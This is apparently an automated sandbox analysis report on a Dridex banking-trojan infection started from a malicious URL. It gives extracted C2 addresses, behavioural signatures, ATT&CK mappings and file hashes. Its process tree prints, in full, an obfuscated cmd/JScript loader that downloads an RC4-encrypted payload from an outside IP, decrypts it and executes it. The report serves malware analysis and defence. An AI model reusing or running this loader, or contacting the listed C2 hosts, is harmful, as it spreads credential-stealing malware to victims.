Analysis

  • max time kernel: 148s
  • max time network: 156s
  • platform: windows10_x64
  • resource: win10v20210410
  • submitted: 21-06-2021 05:06

General

  • Target: https://exitmagall.xyz/iduew73
  • Sample: 210621-mykyk3wv4n

Malware Config

Extracted

  • Family: dridex
  • Botnet: 10111
  • C2:
    139.59.59.242:443
    91.207.28.33:13786
    178.128.197.110:4664
  • rc4.plain
  • rc4.plain

Signatures

  • Dridex

    Dridex (also known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 40 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://exitmagall.xyz/iduew73
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4480
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4480 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4796
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hmX1ZyZgd" "http://188.227.84.168/?NjIyNzQ=&rSPCaVF&oafghc1n4=w3_QMvXcJx7QFYPJKfrcT&s2hdfgdfgt4=6NbP07YA0SD2I_fz-3ORZ3xOWPPk7HPRAOzrl6CelTR8fAlLOECbgK3iheIfgdhmoheVllC9fv4ikDXmEPP1JTQqBWJUQhC96LIVLI46A&end=arena&start=why&yus=118dbobs.119ok77.406b8c6j3&nhyOqlCMTY1MTA=" "2""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4016
        • C:\Windows\SysWOW64\wscript.exe
          wsCripT //B //E:JScript 3.tMp "hmX1ZyZgd" "http://188.227.84.168/?NjIyNzQ=&rSPCaVF&oafghc1n4=w3_QMvXcJx7QFYPJKfrcT&s2hdfgdfgt4=6NbP07YA0SD2I_fz-3ORZ3xOWPPk7HPRAOzrl6CelTR8fAlLOECbgK3iheIfgdhmoheVllC9fv4ikDXmEPP1JTQqBWJUQhC96LIVLI46A&end=arena&start=why&yus=118dbobs.119ok77.406b8c6j3&nhyOqlCMTY1MTA=" "2""
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:768
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c buc10.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4268
            • C:\Users\Admin\AppData\Local\Temp\buc10.exe
              buc10.exe
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:4280

MITRE ATT&CK Matrix (ATT&CK v6)

  • Defense Evasion: Modify Registry, T1112 (1)
  • Discovery: Query Registry, T1012 (1)
  • Discovery: System Information Discovery, T1082 (2)

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5: a64e2d26dd6f37ed569251d6dfc524ca
    SHA1: 8133be8cb0509b8e3ed907715e8df1785c555c6e
    SHA256: 4ca0b012928887c383bce5a4a38f87e85ff1fc9720b0f5ad0aec0bec982e3cdc
    SHA512: a00f8a5ea363e36f56a309becc2faa3ccbf1c5c32671da78338b526d634b0f4c074d44a69280f5d6b629ec050a87950b1236ed7c2650abc1d26b9cdbd3cfbfdd

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5: 5bbd3ec3dff6d6862e6593835cb7ee96
    SHA1: 0432100849d8e576738c47c29947bd75188a43d3
    SHA256: 1976c6c5336d2617a01aca1ea9c37e54c16631f23393e202e54d9f6a42a6eebf
    SHA512: eb35fa3839aa265a457e89338ba150fd6c35a282aa047a3f6eef2fc484047ad24b4b6baf49f3a60538902a6082174037de6cc5f5141d52f6e0e883ec40bd5859

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\LZQJAN73.cookie
    MD5: ca8b70c46725556f8dbe80a44b68ab16
    SHA1: 7e821dc28878b84c5def01256e70d720c6c17c0e
    SHA256: d06e61f584d0223a65a9acae6a3feb444bc299d3b840a9073b7bdbc7011484cf
    SHA512: 3171e78ff7aaa94d3598bc5bb4ddb426fcd05e78f3d65f9a0d17f5b897f0c6d875b77fc98b63d58702621bf82c786faa2b66a2b9130f61de324f7ba756871133

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\TGWWQG9R.cookie
    MD5: e2ebdfed3499bea3ba6fa6e756060948
    SHA1: 23be95d327bdb6c2bf26efc906560ea2ba3b6cab
    SHA256: 1603d3f773d78c156c248fd19b7319736e7686cb4805e51beda8a66f5cf623b2
    SHA512: 01133dada21698e2a35308f6acf0393078545aef43a647dfe1704a9d0b994f18c4e0b46f9e0c72446fbce9d8344890a2dca740186ec2c6f2a2efa2950c79db76

  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5: 60fc00422b399db85f87d41b8328976d
    SHA1: bb85034acad8025f97e5bb236443debaf8926e4b
    SHA256: c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690
    SHA512: 16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

  • C:\Users\Admin\AppData\Local\Temp\buc10.exe
    MD5: dea4a7e0d6430869ba9b80d841293e07
    SHA1: 34f609fcd39daae376fd266c7e57d099ecfe19d1
    SHA256: 3339390888ea181b768ea5a5aa34f537d73705cfe60fdc163e6024e157e8ee69
    SHA512: f6fcd8696fefbfe143389e38fc9915dfb6696d8444e9e497932ce464f963c539f3da2c87ce91802ef65af6ff5c14386dfddc945dc735708fa5b29b8809770e0a

  • memory/768-117-0x0000000000000000-mapping.dmp
  • memory/4016-116-0x0000000000000000-mapping.dmp
  • memory/4268-119-0x0000000000000000-mapping.dmp
  • memory/4280-120-0x0000000000000000-mapping.dmp
  • memory/4280-123-0x00000000020A0000-0x00000000020DC000-memory.dmp (Filesize: 240KB)
  • memory/4280-124-0x0000000000400000-0x0000000000578000-memory.dmp (Filesize: 1.5MB)
  • memory/4480-114-0x00007FF9EB810000-0x00007FF9EB87B000-memory.dmp (Filesize: 428KB)
  • memory/4796-115-0x0000000000000000-mapping.dmp